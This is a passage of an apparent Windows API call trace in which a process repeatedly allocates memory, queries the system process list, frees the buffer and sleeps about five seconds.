Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.363] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.474] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.514] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 